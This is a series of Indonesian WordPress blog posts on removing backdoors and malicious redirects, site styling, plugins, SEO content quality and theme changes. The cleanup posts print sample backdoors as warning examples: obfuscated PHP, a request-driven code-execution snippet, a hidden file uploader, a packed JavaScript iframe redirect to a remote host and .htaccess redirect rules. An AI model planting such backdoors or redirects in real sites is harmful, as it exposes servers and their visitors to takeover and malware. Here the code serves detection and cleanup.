22 Nov 2023

Bagaimana Cara Menghilangkan Backdoor di WordPress

Bagaimana cara menghilangkan backdoor di web atau blog wordpress? Backdoor barangkali bisa kita ibaratkan sebagai pintu belakang. Tetapi, bagi sebuah web wordpress, backdoor atau pintu belakang ini diinstal atau dipasang bukan oleh pemilik rumah. Untuk sebuah bangunan, sulit memasang sebuah pintu tambahan tanpa sepengetahuan pemilik. Tetapi di wordpress, memangan pintu belakang sendiri di website orang dimungkinkan. Semuanya terjadi karena kita jarang mengetahui tentang pemrograman untuk backdoor ini.

Fungsi backdoor ini bisa disetarakan juga dengan fungsi pintu belakang untuk sebuah rumah. Supaya pembuat pintu bisa keluar masuk secara leluasa.

Bagi seorang hacker, backdoor bisa digunakan untuk memperoleh manfaat dari web bersangkutan. Hacker bisa mencuri data atau memasang berbagai malware lain lagi sesuai kepentingannya.

Bagaimana cara mengetahui situs wordpress kita terinfeksi backdoor dan menemukannya?

Backdoor biasanya sulit ditemukan karena biasanya code programnya disamarkan. Meskipun seringkali backdoor berupa kesengajaan dari hacker, terkadang ada juga backdoor yang berupa script maintenance yang tertinggal saat digunakan.

Backdoor bisa ditambahkan melalui plugin atau theme ataupun dengan cara lain.

Jika login kun kita bisa diterobos, maka hacker bisa memasang backdoor dalam bentuk plugin atau theme.

Plugin atau theme ini bisa berbentuk plugin atau theme yang tidak aktif yang berada di sudut halaman theme atau plugin.

Kemungkinan besar, plugin dan theme ini tidak tampak di halaman adminitrative di wordpress. Kita hanya bisa melihatnya melalui file manager atau FTP.

Biasanya juga, backdoor ini diberi nama dengan nama yang tampak berguna seperti:

wordpress support

wp-SEO

atau yang lainnya lagi. Intinya, membuat kita melihatnya sebagai file bermanfaat.

Jika ada file theme atau plugin yang tidak dikenal, atau tidak pernah kita instal, silahkan dihapus saja.

Atau, hapus saja plugin semua dan instal ulang sekalian.

Script untuk backdoor diasanya ditemukan di code / kode Php di web server yang bersangkutan. Code ini ini bisa dimasukan melalui plugin, theme ataupun berupa file standalone.

File yang semacam ini biasanya sangat sulit dicari. Apalagi bila backdoor tidak aktif.

Untuk file backdoor di .htaccess, atau Anda mencurigainya ada disana, silahkan dihapus saja file .htaccess ini. WordPress akan membuat ulang secara otomatis. Tetapi andaikata tidak dibuat ulang, silahkan buka Admin > Setting > Permalink dan klik save.

File .htaccess baru telah dibuat kembali.

Jika script backdoor ada di wp-config.php.

Silahkan bandingkan file wp-config dengan file wp-config-ample.php. Jika ada kode tambahan, silahkan dibuang saja kode tambahannya.

Bagi yang kurang memahami pemrograman, Kita bisa menggunakan plugin “Exploit Scanner atau plugin keamanan “Sucuri” versi berbayar. Aktifkan plugin dan scan.

Bagusnya, plugin ini menscan banyak tempat sekaligus.  Hacker pasti meletakkan script di berbagai tempat.

Beberapa contoh script backdoor:

Anda bisa melihat beberapa code backdoor yang biasa digunakan. Jika Anda menemukan yang semacam ini, silahkan dicurigai.

$t43="l/T6\\:aAcNLn#?rP}1\rG_ -s`SZ\$58t\n7E{.*]ixy3h,COKR2dW[0!U\tuQIHf4bYm>wFz<=DqV@&(BjX'~|ge%p+oMJv^);\"k9";$GLOBALS['ofmhl60'] = ${$t43[20].$t43

atau

if (isset($_REQUEST['FILE'])){
$_FILE =$_REQUEST['92422e6d']('$_',$_REQUEST['FILE'].'($_);');
$_FILE(stripslashes($_REQUEST['HOST']));
}

Atau yang seperti ini:

@ini_set('display_errors','off');
@ini_set('log_errors',0);
@ini_set('error_log',NULL); error_reporting(0); @ini_set('set_time_limit',0);
ignore_user_abort(true);
if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {
@ini_set('upload_max_filesize','1000000');
$size=$_POST['size'];
$open_image=$_FILES['img']['name']; $open_image_tmp=$_FILES['img']['tmp_name'];
$image_tmp=$size.$open_image; @move_uploaded_file($open_image_tmp,$image_tmp);

Script maintenance yang tertinggal tidak dihapus bisa mengijinkan akses ke website secara langsung. Salah satu cointoh file yang terkenal adalah searchreplacedb2.php. Jika tertinggal file ini mengijinkan akses secara langsung ke database wordpress.

Inilah sedikit cara bagaimana menghilangkan backdoor di wordpress, silahkan dicoba. semoga berhasil.

01 Oct 2023

Cara Menghilangkan Redirect Jahat (Malicious) dari Website WordPress Kita

Redirect adalah membelokkan trafik atau pengunjung kita ke website lainnya. Redirect jahat biasanya digunakan oleh mereka yang ingin iklan di websitenya mendapatkan impresi atau klik yang lebih banyak.

Masalahnya, redirect juga menciptakan celah keamanan yang bisa dimanfaatkan untuk menginstal malware atau software yang merusak komputer pengunjung website kita. Intinya, Redirect harus dihilangkan.

Untuk mencegahnya, kita bisa menggunakan plugin security. Jika Anda belum menggunakannya, sebaiknya Anda gunakan sekarang. Kami merekomendasikan plugin seperti Sucuri, Wordfence atau All in One WPSecurity and Firewall. Yang lainnya juga ada dan silahkan Anda coba sendiri.

Tetapi, ada kemungkinan Anda mencapai halaman ini setelah terkena masalah redirect ini. Jadi, inilah cara untuk menghilangkan redirect tersebut.

Yang harus Anda ingat, code redirect ini bisa masuk berkat program jahat lain yang sudah masuk duluan. Mungkin ada backdoor atau program uploader jahat lainnya.

Sekarang kembali ke redirect.

Sebelum mengubah file apapun di WordPress, selalu kita biasakan untuk membackup seluruh situs ke tempat yang aman.

Redirect dapat dimasukkan dimanapun, di file wordpress bahkan di database. Salah satu contoh code untuk redirect dalam bentuk Javascript:

<sc​ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k||e(c)}k=[function(e){returnd[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k){p=p.replace(newRegExp('\\b'+e(c)+'\\b','g'),k)}}returnp}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do​cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get​ElementById|function|createElement|iframe|append​Child|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
</sc​ript> 

Scrip ini biasanya ditemukan di header.

Scrip seperti ini bisa ditemukan dalam script lain. Ia di-load atau dipanggil oleh script yang lainnya.

$.getScript('http://www.[redacted].com/script.js'function()

Langkah dasarnya,

Temukan file javascript yang melakukan redirect. Tidak semua javasriptc di WordPress kita adalah program jahat. Sebagian besar justru merupakan program inti WordPress.

Bagaimana menemukannya?

Yah, karena sudah terlanjur ditulis, kita lihat saja sekalian caranya (meski sebagian).

Menentukan sebuah script sebagai malicious atau tidak memang sulit, terutama bagi yang belum berpengalaman.

Caranya, buka: http://jsunpack.jeek.org

Disana, kita pastekan code milik kita. Jadi akan terlihat apakah code program tadi kode program jahat atau tidak.

http://jsunpack.jeek.org bisa digunakan untuk berbagai file seperti PDF, Javascript serta HTML.

Apabila javascript disamarkan, akan lebih sulit untuk dibaca code aslinya jika dilihat secara manual.

Sebenarnya, ada juga cara mengeceknya dengan browser kita. Semua program untuk internet, HTML, PHP dan Javascript dikenali browser kita sehingga bisa dieksekusi.

Sekarang, kita ganti script tadi di bagian “eval” menjadi “print.” Jadi, daripada mengeksekusi file tadi, browser kita akan memperlihatkan code programnya.

Ini berlaku juga untuk javascript yang sudah disamarkan.

Bagi Anda yang belum terbiasa, gunakan saja http://jsunpack.jeek.org.

2. Bagi pengguna Google Chrome, masukkan “view-source” dibelakang nama situs yang ingin kita cek. seperti ini: view-source:http://www.namasituskita.com. Kita bisa mengetahui bagian mana dari situs kita yang ada redirectnya.

View-source ini akan membagi code program dalam header, body, widget hingga footer. Script redirect tadi mungkin tampil di suatu bagian, entah body, widget atau footer.

Jika redirect ada di template wordpress kita, gunakan theme editor untuk menghapus script redirect tadi. Atau, kita download dulu , kita bersihkan dan upload kembali.

Redirect Javascript yang dimasukkan dalam page atau post.

Bisa untuk semua page dan semua post atau sebagian.

Javascrip redirectnya akan mirip code diatas.

Cara menghilangkannya harus dengan mengedit halaman post atau page bersangkutan satu persatu.

Atau, bisa kita edit melalui tool databse seperti PhpMyAdmin yang memungkinkan mengedit banyak post atau halaman sekaligus.

Javascript Redirect yang dipasang di Widget dan Htaccess.

Untuk javacsript yang dipasang di widget, ganti saja dengan widget baru. Yang lama dihapus saja.

Untuk Javascript yang dipasang di Htaccess, kita perlu download file htaccess yang ada, bersihkan dan upload kembali.

Contoh script redirect:

RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobi

Htaccess bisa digunakan meredirect berdasar browser yang digunakan atau darimana pengunjung kita datang. Misal pengunjung dari Google diredirect ke web mereka.

RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|ms

Cara membersihkannya, cek program disana dengan website tadi. Jika bersih berarti ok. Jika ada peringatan malicious, buang saja bagian tersebut.

Javascript Redirect dari iklan.

Beberapa iklan yang murah membiarkan atau tidak punya kemampuan menghindari redirect dari pengiklan mereka.Jika kita sulit mengetahui iklan mana yang menimbulkan masalah dan memblokirnya, buang saja iklan ( ad network ) tadi semuanya. Ganti saja dengan iklan lainnya.

30 Jul 2023

Tips dan Trik Membuat Tampilan WordPress Terlihat Profesional

Tips dan trik  situs WordPress ini ditujukan bagi Anda yang ingin tahu apa yang digunakan oleh situs – situs wordpress populer. Tips dan trik ini akan membuat kita bisa membuat situs seperti profesional.

Tanpa basa – basi lagi, inilah kumpulan tips dan trik situs WordPress.

  • Menggunakan custom homepage

Secara default, wordpress menggunakan halaman posting kita di homepage atau halaman muka.

Tetapi, kita bisa membuat homepage berupa halaman page statis kita. Lawangtechno.com juga menggunakan halaman page statis didepan.

Yang pertama, kita buat dahulu halaman yang ingin kita tempatkan didepan. kemudian ke Setting –> Reading kemudian pilih A Static Page. Halaman yang akan kita tempatkan dimuka kita pilih sendiri dari menu drop down dibawahnya.

Kita pilih halaman statik. Halaman ini bisa kita desain secara khusus. Untuk lawangtechno.com, halaman muka tidak mengalami perubahan. Tetapi, link halaman post memang dibuatkan di tempat khusus di footer.

  • Menghapus nomer versi WordPress

Kita semestinya menggunakan versi terakhir wordpress. WordPress versi terakhir sudah sangat berbeda dibanding versi 2 tahun yang lalu. Tetapi, mungkin kita masih mau menghilangkan catatan untuk versi WordPress kita bagi orang lain.

Caranya, kita tampabkan code berikut di situs kita:

function wpb_remove_version() {
return '';
}
add_filter('the_generator', 'wpb_remove_version');
Ada gunanya menghilangkan catatan versi WordPress kita. Misalnya, kita memerlukan keamanan yang lebih baik dari hacker. Hacker biasanya mencari versi wordpress kita.
  • Menambah Logo Dasboard custom

Kalau kita ingin membuat label sendiri di WordPress kita, kita membutuhkan logo merk kita di Dasboard.

pertama kalinya, kita harus mengupload logo kita terlebih dahulu. Ukurannya sekitar 16 X 16 pixel.

function wpb_custom_logo() {
echo '
<style type="text/css">
#wpadminbar #wp-admin-bar-wp-logo > .ab-item .ab-icon:before {
background-image: url(' . get_bloginfo('stylesheet_directory') . '/images/custom-logo.png) !important;
background-position: 0 0;
color:rgba(0, 0, 0, 0);
}
#wpadminbar #wp-admin-bar-wp-logo.hover > .ab-item .ab-icon {
background-position: 0 0;
}
</style>
';
}
//hook into the administrative header output
add_action('wp_before_admin_bar_render', 'wpb_custom_logo');
  • Menggunakan theme kustom

Theme custom adalah salah satu cara membuat WordPress terlihat lebih profesional. Kita bisa membuatnya dengan modal theme yang ada.
Yang jelas, semakin banyak pengetahuan Anda hasilnya akan semakin baik. Minimal, kita bisa mengganti desain wordpress kita.
Kita bisa mengganti header, warna sidebar atau background situs kita.
Jika ingin total, silahkan menggunakan premium theme.
  • Menggunakan widget yang pas

Seberapa banyak widget yang pas untuk website Anda? Kita memerlukan widget dalam jumlah yang sesuai. Misal, untuk blog, kita memerlukan widget berisi categories. Untuk website berdesain portal, mungkin kita memerlukannya jika konten kita sangat banyak.

Tetapi website seperti lawangtechno.com tidak terlalu memerlukan widget.

  • Berdesain responsif / harus responsif

Saat ini, 80% pengakses internet menggunakan perangkat mobile. Mulai dari smartphone yang kecil hingga tablet berlayar 12 atau 14 inchi.

Untuk gadget berlayar kecil ini, situs kita harus responsif. Situs harus bisa tampil menyesuaikan ukuran layar yang terbatas.

Caranya:

Menggunakan theme terkini yang sudah responsif. Untuk theme lama, silahkan diupdate. Atau, gunakan theme baru sama sekali.

Tetapi sebelumnya, ini ada pertimbangan sebelum mengganti theme WordPress.

  • Mengganti permalink

Penggantian ini harus dilakukan saat awal WordPress dibangun. Jika tidak, backlink kita bisa hilang semua.

Untuk membuat seting permalink yang baik, kita gunakan saja: namadomain.com/judul posting.

cara membuat permalink wordpress

Ini akan mempermudah mesin telusur untuk mengambil judul posting kita. Kita, menempatkan kata kunci disana. Hasil akhirnya adalah SEO yang baik.

Untuk tanggal, bulan dan sebagainya, tidak perlu dimasukkan. Judul yang akan terlihat di hasil pencarian Google terbatas karakternya. Pembaca tidak akan melihat semuanya.

  • Menggunakan featured Image

Featured image akan muncul bahkan hingga di Pinterest. Inilah gunanya featured image. Kita bisa berbagi tanpa ribet membaginya satu – satu.

Selain itu, plugin galery wordpress biasanya juga menggunakan featured image untuk menampilkan gambar kita di gallery bersangkutan. Jika belum kita buat, maka kita harus membuatnya lagi satu persatu dari posting tertama.

  • Menambah logo

Memiliki logo sendiri akan membedakan kita dari orang lain. saat ini, kita mestinya memiliki merk sendiri dan membangunnya.

  • Menggunakan favicon

Favicon akan tampil di brower kita dan menjadi tanda dari situs kita yang sedang dibuka. Favicon adalah yang diberi bulatan merah.

 

cara membuat wordpress terlihat profesional - faviconAdanya favicon akan menambah kesan keren situs. Situs yang terlihat “lengkap” akan terlihat lebih profesional. Silahkan menggunakan icon atau logo situs Anda. Kita cukup membuat gambarnya menjadi 16 X 16 pixel saja.

Tetapi jika logo kita rumit, silahkan membuat lagi yang sederhana supaya tetap terlihat.

  • Membuat “related post” dibawah setiap artikel

Jika bingung membuatnya, kita menggunakan plugin. Yang terkenal diantaranya adalah Yet another related posts. Downloadnya telah mencapai lebih dari 3 juta.

Tetapi, kita juga bisa menggunakan yang lainnya. Dan, bisa juga menggunakan plugin related post dengan image.

  • Memiliki domain custom

Sulit untuk terlihat profesional jika kita masih menggunakan domain gratis yang berakhiran .blogspot.com atau .wordpress.com.

Kecepatan Website

Kita harus membuat situs kita cepat loadingnya. Kita mesti membuat situs cepat terlihat saat dibuka. Jika tidak, maka situs kita akan dianggap tidak profesional.

15 tahun lalu, kita mungkin masih mau menunggu 20 detik untuk membuka sebuah situs. Sekarang tidak lagi.

Toleransi masyarakat sekarang dibawah 5 detik.

Ini panduan mempercepat website wordpress.

  • Menambah tombol share

Menambahkan tombol share penting. Selain lebih terlihat “techie” juga memudahkan konten kita dibagi di media sosial.

  • Font

Yang jelas, kita memerlukan konten yang mudah dibaca. Untuk theme premium, ada pilihan font yang banyak. Untuk theme biasa, kita terpaksa mengeditnya sendiri.

Jika tidak mengetahui caranya, ya tidak apa – apa. Tetapi lebih baik kita usahakan memilih theme yang fontnya mudah dibaca. Da, kalau bisa menarik dalam hal styling dan warna.

  • Menggunakan jumper atau lompatan untuk artikel

Ada plugin untuk membuat jumper. Yaitu kita bisa balik ke atas, ke tengah atau ke bawah artikel.

Kita juga memerlukan link ke sub bagian tulisan kita. Kita bisa menggunakan sub header saat menulis.

Selain memudahkan pembaca, sebuah lompatan juga menambah kesan “premium” untuk situs kita.

Bagi Anda yang tidak mau menggunakan plugin untuk membuat lompatan halaman, ini cara membuat lompatan halaman di Wordpres.

  • Harus punya search bar

Kolom pencarian ini penting untuk dimiliki. Kolom pencarian akan membuat pengunjung lebih betah. Mereka bisa mencari konten yang diinginkan.

Jika theme gratis kita tidak memilikinya, kita ganti dengan plugin. Yang, biasanya desainnya lebih keren juga daripada kolom pencarian standar.

  • Menggunakan footer kustom

Jika theme kita menggunakan footer custom, pastinya akan terlihat lebih profesional daripada lainnya.

Jika bingun bagaimana caranya, kita kembali bisa menggunakan plugin untuk melakukannya.

  • Menambahkan contact form

Prinsipnya, kita memudahkan pengunjung menghubungi kita. Jika blog kita hanya kita niatkan untuk menulis, bagaimana?

Tetap saja kita akan melewatkan kesempatan.

Saya memiliki teman pengelola wisata yang mengawalinya dengan blog wisata. Tetapi, karena blog wisatanya bagus, ada yang bertanya – tanya di kontak formnya. Akhirnya, teman ini justru membuka biro wisata sendiri.

Kesimpulan

WordPress barangkali merupakan CMS gratis dan ada juga theme serta plugin gratis untuk menambah fungsinya. Tetapi, kita tetap saja bisa membuat situs wordpress kita terlihat lebih profesional dengan beberapa sentuhan.

27 Jul 2023

5 Plugin Utama Untuk Pengguna WordPress Pemula

5 Plugin Utama Untuk Pengguna WordPress Pemula

Saat menggunakan wordpress untuk membuat blog yang pertama kali, ada beberapa plugin yang sangat direkomendasikan untuk digunakan.

Jumlah plugin sebenarnya sangat banyak. Tetapi, untuk awalnya kita menggunakan 5 yang mungkin merupakan yang paling penting bagi situs baru kita.

Biasanya, plugin yang banyak sekali ini belum tentu cocok untuk keperluan kita. Tetapi, kita baru mengetahuinya saat sudah mencobanya.

Setelah beberapa kali membangun website dan menginstall plugin, kita akan memiliki koleksi plugin yang cocok dengan kita. Tetapi, biasanya semua perlu waktu.

Sistem di WordPress memiliki sistem untuk memberi rating bagi plugin yang ada disana. Tetapi, meskipun pluginnya baik, belum tentu yang paling pas untuk keperluan kita.

Tetapi, setidaknya ada beberapa, 5 plugin yang mestinya kita miliki jika menggunakan WordPress.

5 Plugin wajib yang harus digunakan di Wordress

  1. Plugin untuk cookie dan kecepatan situs.

  2. Plugin untuk keamanan

  3. Plugin media sosial

  4. Plugin SEO

  5. Plugin Spam protection

Sekarang kita bahas satu – persatu:

 1. Plugin untuk cookie dan kecepatan situs

Plugin Cookie dan kecepatan untuk situs kita sangat penting. Saat ini pengunjung sebuah website tidak mau menunggu lebih lama daripada 5 detik.

Setelah menunggu situs terbuka lebih dari 5 detik, separuh dari calon pengunjung situs kita sudah kabur.

Pada tahun 2008, kita masih mau menunggu lebih lama. Tetapi, sekarang tidak lagi.

Untuk plugin yang kami rekomendasikan ada 2.

WP Super Cache serta plugin LiteSpeed Cache. Keduanya bagus dan terkenal. Yang WP super Cache sudah sangat terkenal tetapi merupakan plugin keluaran lama.

Plugin LiteSpeed Cache adalah plugin yang lebih baru dengan fitur yang aagak berbeda.

Secara umum, kedua plugin ini membuat halaman dinamis WordPress menjadi halaman statis. WordPress menggunakan database yang loading setiap halaman dimuat. Dengan kedua plugin diatas, setiap halaman akan dibuatkan versi statisnya.

Jadi, kunjungan ke halaman kita tidak perlu loading database serta eksekusi berbagai script lagi untuk menampilkan halaman yang dibuka pengunjung.

2. Plugin untuk keamanan

Plugin untuk keamanan sangat penting. Bahkan, untuk pengguna WordPress pemula akan jauh lebih penting lagi.

Memiliki situs yang kena hack akan menyulitkan bagi pemula. Memperbaikinya akan perlu waktu. Saya pernah mengalaminya. Saat itu, wordpress saja saya baru bisa. Permograman belum pernah tahu.

Ada beberapa plugin keamanan yang kami rekomendasikan. Diantaranya adalah: Wordfence, Sucuri Security, iThemes security dan beberapa lainnya.

Untuk lebih lengkapnya, silahkan mengunjungi link berikut. Cara mengamankan website WordPress.

3. Plugin media sosial

Saat ini, media sosial adalah faktor penting untuk keberhasilan website. Kita perlu membagi posting kita disana.

Ada 2 keuntungan yang kita peroleh.

Yang pertama adalah lebih terkenal.

Yang kedua adalah mendapatkan backlink.

Semuanya akan membuat pengunjung kita bertambah.

Rekomendasi kami adalah: Jetpack. Ini adalah plugin lengkap buatan WordPress sendiri.

4. Plugin SEO

Kita ingin website kita dikunjungi banyak orang. Jadi, kita menggunakan plugin SEO atau Search Engine Optimization.

Rekomendasi kami adalah Plugin SEO dari Yoast. Ini adalah plugin yang terbaik dengan fitur yang terlengkap.

Plugin ini memandu kita untuk memperoleh konten yang SEO friendly untuk setiap posting kita.

Jika kita ikuti panduannya, maka rangking kita di Google biasanya akan cepat naik.

5. Plugin Spam Protection

Rekomendasi kami, mengaktifkan plugin akismet milik wordpress.

Ini adalah salah satu plugin yang sangat penting. Kita pastinya akan kesulitan menangani komentar SPAM tanpa menggunakan plugin.

Bayangkan saja, jika pengunjung kita ada 50 orang sehari, maka komentar spam yang masuk lewat spam otomatis bisa mencapai ratusan.

Yang pasti, akan repot membedakan komentar Spam dengan komentar yang baik untuk website kita.

Tetapi, jika komentar spam tidak kita hapus, maka akan merusak rangking SEO kita.

Mengapa?

Karena sebagian besar (90%) komentar spam itu merupakan komentar duplikat yang ada di banyak sekali website lain.

Kemudian, isi komentar spam biasanya tidak berhubungan dengan konten kita.

Hasilnya, Google akan melihat situs kita sebagai “sarang spam” dan memberikan penalti berupa penurunan rangking.

Baca juga: apa yang perlu dipertimbangkan saat mengganti template wordpress.

Kesimpulan

Memiliki website wordpress bagi pemula merupakan sebuah kemajuan setelah menggunakan blog gratis.

Tetapi, ada beberapa tantangan mendasar.

Yang terpenting adalah soal hacker serta soal komentar spam.

Setidaknya, ini adalah pengalaman pribadi saya. Kedua hal ini yang paling sering mengganggu aktivitas blog saya saat pertama dahulu. Saat itu tahun 2008.

Sekarang, setidaknya, kita mesti menggunakan 5 plugin diatas untuk keperluan blog kita.

Ada yang lainkah?

Ya, ada juga. Tetapi ada yang “berat” loadingnya dan sebagainya. Jika ingin tahu cara mengecek kecepatan plugin, silahkan melihat di pingdom.com.

Kita gunakan 1 plugin dan test kecepatannya. Kemudian, kita ganti plugin lain dan test kecepatan halaman kita.

Tetapi, saat website masih baru perbedaannya akan sedikit. Saat pengunjung dan kontennya banyak, perbedaan kecepatan bisa signifikan.

Inilah sedikit gambarah plugin wordpress rekomendasi kami untuk pemula. Semoga bermanfaat dan salam sukses luar biasa!

03 Dec 2022

Apakah High Quality dan Low Quality Content Itu?

Apakah High Quality dan Low Quality Content Itu?

Apabila kita perhan mendengar tentang high quality content, maka kita juga sering mendengar tentang low quality content. Bagaimana Google melakukan perangkingan semacam ini?

Dahulu, Google melakukannya dengan cara melihat kata kunci halaman, backlink dan sebagainya. Pada tahun – tahun itu, semuanya sangat teknikal. Tetapi, ada saatnya Google kembali ke yang paling penting, pengguna internet.

Google menilai konten / content yang baik dan kurang baik berdasarkan pengalaman pengguna di website tertentu.

Halaman berkualitas tinggi secara umum menjadi halaman rujukan oleh pengguna internet lain. Jadi, halaman semacam ini pasti mendapat backlink yang baik dan bisa jadi banyak. Tetapi, sepanjang 1 dekade lebih, ada saja yang berusaha mengakalinya dengan membuat dan membeli link dari berbagai tempat. Link ini bagaimanapun juga, mendapatkan penilaian yang baik dari Google dan websitepun masuk rangking tinggi.

Sekarang, meskipun Google menilai pertambahan link, apakah terlihat alami atau spam, tetapi Google juga membuat parameter lainnya.

  • Pengalaman pengunjung

Pengalaman pengunjung adalah parameter yang tidak bisa dibeli pemilik website.
Misalnya:

Tingkat bounce rate atau tingkat pregunjung yang “langsung cabut” saat membuka website menjadi patokan Google menilai kualitas. Jika website bagus, maka pengunjung pastinya akan sedikit betah.

Tingkat bounce rate ini kini menjadi parameter untuk perangkingan di Google.

  • Lama waktu kunjungan

Lama waktu kunjungan di sebuah situs kini juga menjadi perhatian bagi Google. Waktu kiunjungan yang rata – rata panjang membuat rangking website naik.

  • Share di media sosial

Salah satu tanda kualitas bagi Google adalah adanya share konten di media sosial. Makin sering dibagikan, makin tinggi juga rangking halaman tadi.

Ketiga faktor tadi adalah faktor yang sangat alamiah. Kita tidak bisa merekeyasanya supaya web kita terlihat bagus.

Satu – satunya cara untuk mendapatkan rangking yang baik hanyalah dengan membuat konten yang baik.

Selain itu, Google dan search engine lain mempergunakan beberapa faktor lain untuk perangkingan.

Pengertian Low Quality Content

Sebaliknya, low quality content adalah konten yang tidak disukai pengunjung. Misalnya, sulit dibaca sehingga pengunjung langsung cabut begitu membuka website.

Website yang lambat sebenarnya juga merupakan faktor yang memperburuk rangking. Jika website lambat, pengunjung belum tentu mau menunggu web terbuka penuh dan langsung berpindah ke web atau blog lainnya.

Kembali ke konten ada beberapa faktor yang membuat konten menjadi berkualitas rendah.

  • Tata bahasa yang tidak sesuai

Bagi yang menulis website berbahasa Inggris, sekarang Google Panda memberikan penilaian secara ketat terhadap gramar. Masalahnya, bertahun – tahun yang lalu, ada banyak orang yang menggunakan Google translate untuk mentranslate arrtikel secara langsung ke dalam bahasa Inggris dan memposting kembali.

  • Halaman atau situs terkena virus

Situs yang terkena virus biasanya bukan karena kesalahan pemiliknya. Tetapi, tetap saja mengganggu jika tidak dibersihkan. Jadi, lama – kelamaan pasti akan kena penalti Google juga.

  • Terlalu banyak iklan yang tampilannya mengganggu

Apalagi bagi website dengan banyak iklan pop-up. Saat ini rangking mereka pasti rendah sekali. Beberapa waktu yang lalu, kita masih sering menemukan website dengan banyak iklan pop up. Dan, kita pasti terganggu kan?

  • Desain website

layout atau warna yang tidak baik membuat pengunjung tidak betah.

  • Situs yang tidak terawat

Situs ini tidak diupdate secara teratur, banyak link yang rusak atau gambar yang hilang. Jika terbukti mengganggu pengguna dan menurunkan waktu kunjungan misalnya, rangking pasti ikut turun.

Tema situs tidak jelas. Dengan tema yang sulit ditebak, maka Google juga kesulitan memberikan rangking.

Artikel yang tidak ditulis dengan baik, tidak akurat dan sebagainya. Semua akan mempengaruhi waktu kunjungan secara keseluruhan dan mempengaruhi rangking juga.

  • Konten duplikat

Apabila konten kita dideteksi sebagai duplikat, maka Google bahkan akan memberikan penalti.

Nah, ini adalah beberapa faktor yang sekarang menentukan high quality content dan low quality content. Secara umum, high quality content ditandai dengan kemampuannya untuk membuat pengunjung lebih senang dengan website kita. Google melihatnya dalam beberapa parameter yang kami sebutkan diatas.

Jika pengunjung terlihat senang, maka website kita mendapatkan rangking yang baik.

Sebenarnya, banyak faktor lain yang bisa Anda sebutkan atau Anda temui sendiri. Anda juga bisa  mengetahui apa saja yang membuat pengunjung Anda betah berkunjung ke web Anda.

Untuk SEO tahun – tahun kedepan, high quality, low quality content dan pengalaman pengunjung tampaknya akan semakin menjadi faktor SEO yang penting.

22 Dec 2021

5 aplikasi website developer dalam android anda

Pada awal tahun 2000 an orang yang kemana-mana menggunakan laptop, misal kita di stasion, terminal atau bandara melihat orang menggunakan laptop pasti dalam bayangan kita dia adalah pengusaha atau bisnisman. Akan tetapi perkembangan IT lebih cepat berkembang dibanding perekembangan tekhnologi lainnya. Saat ini kejayaan laptop sudah pudar. Untuk menjalankan bisnis khususnya bisnis yang berhubungan dengan IT orang sudah tidak memerlukan laptop lagi.

Ya Era android, ios, atau smartphone lainnya sudah menggeser keberadaan laptop yang terlalu berat untuk di angkut kemana-mana. Tentu untuk menjalankan bisnis yang berbasis IT di android, ios atau smartphone anda harus di lengkapi dengan beberapa aplikasi pendukung yang akan membantu anda bekerja. Berikut adalah 5 aplikasi website developer dalam android anda:

  • WordPress

Saat ini suka atau tidak suka, harus kita akui wordpress adalah pengembang CMS (conten managament system) yang paling banyak digunakan orang dalam mengembangkan website mereka. Tentu ini mesti bisa diakses di semua gadget. Untuk itu aplikasi wordpress sudah bisa anda instal di android anda.

  • Google analytic

Website dan google analytic bagi seorang website developer merupakan hal yang wajib untuk di ikuti. Karena artikel atau hal-hal yang sedang ngetrend bisa dikses dari sini. Dengan kata lain Google analytic adalah sumber inspirasi.

  • Codeanywhere

Website tidak akan lepas dari penulisan code-code pemrograman seperti HTML, CSS, MYSQL, Java script, PHP dan lain-lain. Codeanywhere adalah aplikasi yang menyediakan tools untuk code-code yang di butuhkan.

  • AndFTP

 AndFTP berfungsi untuk  FTP, FTPS, SCP, SFTP client. Dengan kata lain Andftp adalah passford anda untuk mengupload berbagai file. Mengedit file atau menghapus file.

  • Vew web source

Sesuai namanya aplikasi ini di gunakan untuk melihat sumber/source html sebuah website.

Demikianlah 5 aplikasi developer website dalam android anda. Semua aplikasi tersebut bisa anda dapatkan dlama google play atau play stroe. Selamat mencoba.

10 Nov 2021

Apa Saja yang Perlu Dipertimbangkan Sebelum Mengganti Theme WordPress

Apa saja hal – hal yang perlu kita pertimbangkan sebelum mengganti theme WordPress kita.

Beberapa hal menjadi penting saat kita mengganti theme atau tampilan situs wordpress kita. Meskipun sekedar penampilan baru, tetapi beberapa fitur akan terpengaruh. Ada plugin yang mungkin tidak kompatibel dengan theme baru kita.

Script Google Analytics yang tidak bekerja serta beberapa hal lain perlu menjadi pertimbangan.

Secara umum, inilah hal yang perlu dipertimbangkan saat mengganti theme WordPress.

  • Mencatat theme saat ini.

Biasanya kita mendapat tips WordPress dari internet. Masalah mendasarnya, mungkin kita mendapat code, snippet atau script untuk modifikasi theme. Tetapi, karena langsung kita terapkan, maka perubahan tadi pasti terlupakan.

Sekarang, kita mungkin perlu mencatat perubahan yang telah kita buat.

  • Mengecek kecepatan theme.

Kita perlu test kecepatan theme kita yang sekarang untuk kita bandingkan dengan theme penggantinya. Kita bisa menggunakan tools.pingdom.com untuk mengetest theme kita.

  • Memperhatikan sidebar.

Hati – hati dengan sidebar. Ada theme yang tidak ramah dengan widget kita.

Tetapi, sidebar juga merupakan bagian yang paling sering kita ubah. Kita memasang iklan disana, membuat custom text dan sebagainya. Jadi, harus kita pastikan theme kita widget ready.

